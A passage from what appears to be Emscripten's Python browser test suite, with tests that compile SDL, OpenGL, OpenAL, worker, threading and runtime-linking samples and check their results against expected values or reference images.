for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'EXIT_RUNTIME=1']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_test_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'USE_REGAL=1', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_test_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
self.compile_btest([path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
self.set_setting('ASM_JS', 1)
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
for wasm in [0, 1]:
if not wasm and self.is_wasm_backend():
continue
print(wasm)
main, supp = self.setup_runtimelink_test()
create_test_file('supp.cpp', supp)
self.compile_btest(['supp.cpp', '-o', 'supp.' + ('wasm' if wasm else 'js'), '-s', 'SIDE_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'EXPORT_ALL=1'])
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'WASM=%d' % wasm, '-s', 'RUNTIME_LINKED_LIBS=["supp.' + ('wasm' if wasm else 'js') + '"]', '-s', 'EXPORT_ALL=1'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_test_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_test_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_test_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_test_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [['-s', 'WASM=0'], ['-s', 'WASM=1']]:
if 'WASM=0' in mode and self.is_wasm_backend():
continue
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_test_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync startup, call too late')
create_test_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '--memory-init-file', '0', '-s', 'EXIT_RUNTIME=1'] + extra_args + mode)
print('sync, runtime still alive, so all good')
create_test_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js', '--memory-init-file', '0'] + extra_args + mode)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS=1', '--pre-js', path_from_root('tests', 'browser', 'cwrap_early.js'), '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["cwrap"]'], expected='0')
def test_worker_api(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([path_from_root('tests', 'worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-O2', '--minify', '0', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two", "_three", "_four"]', '--closure', '1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify', '0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([path_from_root('tests', 'worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([path_from_root('tests', 'worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER=1', '-s', 'EXPORTED_FUNCTIONS=["_one"]'] + self.get_async_args())
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('http.cpp', expected='0', args=['-I' + path_from_root('tests')])
# TODO: test only worked in non-fastcomp
@unittest.skip('non-fastcomp is deprecated and fails in 3.5')
def test_module(self):
self.compile_btest([path_from_root('tests', 'browser_module.cpp'), '-o', 'module.js', '-O2', '-s', 'SIDE_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORTED_FUNCTIONS=["_one", "_two"]'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE=1', '-s', 'DLOPEN_SUPPORT=1', '-s', 'EXPORT_ALL=1'], expected='8')
def test_preload_module(self):
create_test_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.compile_btest(['library.c', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'library.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
os.rename('library.wasm', 'library.so')
main = r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
REPORT_RESULT(1);
return 1;
}
void *lib_handle = dlopen("/library.so", 0);
if (!lib_handle) {
REPORT_RESULT(2);
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
REPORT_RESULT(3);
return 3;
}
REPORT_RESULT(0);
return 0;
}
'''
self.btest(
main,
args=['-s', 'MAIN_MODULE=1', '--preload-file', '.@/', '-O2', '-s', 'WASM=1', '--use-preload-plugins', '-s', 'EXPORT_ALL=1'],
expected='0')
def test_mmap_file(self):
create_test_file('data.dat', 'data from the file ' + ('.' * 9000))
for extra_args in [[], ['--no-heap-copy']]:
self.btest(path_from_root('tests', 'mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'] + extra_args)
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = run_process([PYTHON, path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = run_process([PYTHON, path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
# Deliberately named as test_zzz_emrun to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_emrun(self):
self.compile_btest([path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
outdir = os.getcwd()
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the browser that is launched will have that directory as startup directory,
# and the browser will not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to delete it. Therefore switch away from that directory
# before launching.
os.chdir(path_from_root())
args_base = [PYTHON, path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile', '--port', '6939', '--verbose', '--log_stdout', os.path.join(outdir, 'stdout.txt'), '--log_stderr', os.path.join(outdir, 'stderr.txt')]
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and '-profile' in browser_args:
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--no_private_browsing', '--port', '6941']
]:
args += [os.path.join(outdir, 'hello_world.html'), '1', '2', '--3']
proc = run_process(args, check=False)
stdout = open(os.path.join(outdir, 'stdout.txt'), 'r').read()
stderr = open(os.path.join(outdir, 'stderr.txt'), 'r').read()
assert proc.returncode == 100
assert 'argc: 4' in stdout
assert 'argv[3]: --3' in stdout
assert 'hello, world!' in stdout
assert 'Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~' in stdout
assert 'Testing char sequences: %20%21 ä' in stdout
assert 'hello, error stream!' in stderr
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner.py browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.compile_btest(['-O2', '--closure', '1', path_from_root('tests', 'uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = run_js('test.js', full_output=True)
print(out)
# Tidy up files that might have been created by this test.
try_delete(path_from_root('tests', 'uuid', 'test.js'))
try_delete(path_from_root('tests', 'uuid', 'test.js.map'))
# Now run test in browser
self.btest(path_from_root('tests', 'uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
